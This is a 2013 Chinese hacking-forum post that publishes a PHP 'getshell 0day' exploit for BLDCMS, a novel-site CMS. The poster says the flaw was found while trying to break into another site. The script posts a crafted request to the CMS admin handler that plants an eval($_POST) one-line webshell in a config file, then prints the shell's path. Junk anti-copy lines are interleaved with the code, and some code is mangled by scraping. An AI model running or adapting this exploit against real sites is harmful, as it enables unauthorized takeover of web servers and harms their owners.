中国网络渗透测试联盟
标题:
BLDCMS(白老大小说) Getshell 0day EXP
[打印本页]
作者:
admin
时间:
2013-3-26 20:49
标题:
BLDCMS(白老大小说) Getshell 0day EXP
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
" U" Z4 V0 C, i0 l
* [& j. t" v0 x2 e- d
% Z" h6 _! K% I% I
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
* {) c0 f9 ` m, J9 \( Q. ]# u+ M$ }8 Z. o
/ M' k1 ? l+ a2 d% g0 w
既然都有人发了 我就把我之前写好的EXP放出来吧
. R( ]! l: o# |; V3 T+ v/ m& h
8 ?3 _, G$ c* V) K2 u N5 N2 Y
view source print?01.php;">
8 r$ Z5 Y+ |7 C: y& Z3 Y8 ^
02.<!--?php
8 w3 G& q( k! x8 p) p
03.echo "-------------------------------------------------------------------
/ M' m3 d* ?/ q: z; j) H, P
04.
) d" H. _8 v* ]8 _+ U
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
}. f9 M- O, V
06.
, E6 X. v5 @( R% f. M' x
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
% V8 ^1 O" L3 r3 A
08.
, o- F* W! p3 @5 j ~7 k
09.QQ:981009941\r\n 2013.3.21\r\n
8 L& v. o0 c u8 Z2 q+ S
10.
4 D9 r1 V' u0 r# j: p
11.
' u8 e. A% u1 G1 H' l" d+ @$ \
12.用法:php.exe EXP.php
www.baidu.com
/cms/ pass(一句话密码
8 e* g# [* u, N* d- Z- a3 z
13.
9 [; p) Q; _ W* w6 m1 ?
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
7 E7 l& Z0 I3 x, v7 G& a
15.
; I1 R7 p3 ?5 o& b- l' `( ]! Z
16.--------------------------------------------------------------------\r\n";
1 ~) `8 v( C) Z: f0 }
17.$url=$argv[1];
+ {5 G% V. W& _& } E: b
18.$dir=$argv[2];
`( G7 b0 k3 C
19.$pass=$argv[3];
9 _/ t) X3 r5 z
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
, R9 }( v- W9 L
21.if (emptyempty($pass)||emptyempty($url))
; `2 |' g' R. |" r* ?
22.{exit("请输入参数");}
; P/ T# G- h( p' c+ p
23.else
2 z. m l1 f8 D6 W# Z3 h! n
24.{
! I2 y3 E# B6 ^7 `# {3 |$ v
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
- O$ e$ L. K" g0 g9 e. ?
26.
/ a, j5 E y$ m/ n& G4 S% Y; @0 R
27.al;
: A. X0 N! s6 r8 p O
28.$length = strlen($fuckdata);
: T5 g" p' \ X6 H5 ~ ^% x O u
29.function getshell($url,$pass)
$ l( t7 y) r3 ~% p# j3 }0 x" M
30.{
. z$ P, m* N0 z! R. [# C
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
: ^. }$ N/ t$ N6 o9 _+ O
32.$header = "
OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
& Z# v0 p- v& ?+ t7 J
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
0 H4 B3 K5 B6 T! r
34.$header .= "User-Agent: MSIE\r\n";
: o& L7 I. B/ z/ o9 n, z& L
35.$header .= "Host:".$url."\r\n";
4 v6 l- \( G7 t/ @* K; u* I- ?! Y
36.$header .= "Content-Length: ".$length."\r\n";
4 g, c4 o2 M; o ~
37.$header .= "Connection: Close\r\n";
; F! F) o. R) w3 Z4 h3 [" P
38.$header .="\r\n";
9 T( q. Q$ m$ o6 z. _
39.$header .= $fuckdata."\r\n\r\n";
* Y$ `9 d" i1 u1 V* I' D% G
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
+ l( v& ~5 X+ P F* C
41.if (!$fp)
) p/ _% z. c9 j: s/ h( |
42.{
& g2 c/ G) Q" l* P5 \
43.exit ("利用失败:请检查指定目标是否能正常打开");
9 L, M% Q v# a0 q c0 m4 ?
44.}
5 a1 B- W. ]8 i. g( s( J7 T
45.else{ if (!fputs($fp,$header))
9 ]& y! a7 h. Y. F; I! H
46.{exit ("利用失败");}
8 e! I5 b- @0 ^- `3 j
47.else
5 W( x! m- ?8 b9 v: R- L
48.{
. R8 G/ F8 s9 n" H! M
49.$receive = '';
! D/ Z _0 N, ]" v, F# N
50.while (!feof($fp)) {
3 R, x( x9 G* h/ M" k* o
51.$receive .= @fgets($fp, 1000);
! @# J/ P4 t& _3 w* P C3 K( E
52.}
, n1 @, W7 [: b8 y( }( Q9 |
53.@fclose($fp);
% o$ W2 a: Y5 Z8 D3 v
54.echo "$url/$dir/conn/config/normal2.php pass
pass(如连接失败 请检查目标
+ d3 a! v7 S0 [) V
55.
o, w. U) z) \% `6 O5 K
56.GPC是否=off)";
! \) b; C2 F. R" B; [" R( T' q
57.}}
# J: ?% @5 |2 v( @2 I
58.}
- J. h2 E2 I0 ?+ `, c# b
59.}
7 S4 n: _) y$ ^# O
60.getshell($url,$pass);
- q+ h7 K- j8 U8 b4 ]2 t4 }
61.?-->
' p: L7 P3 n& q0 {4 r' c
4 t. h# u6 b; q/ x1 }) x
2 `: E2 @! P" H5 @4 ~
; G: V E$ E& r
by 数据流
2 s0 h Z0 P+ v1 w4 Q
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2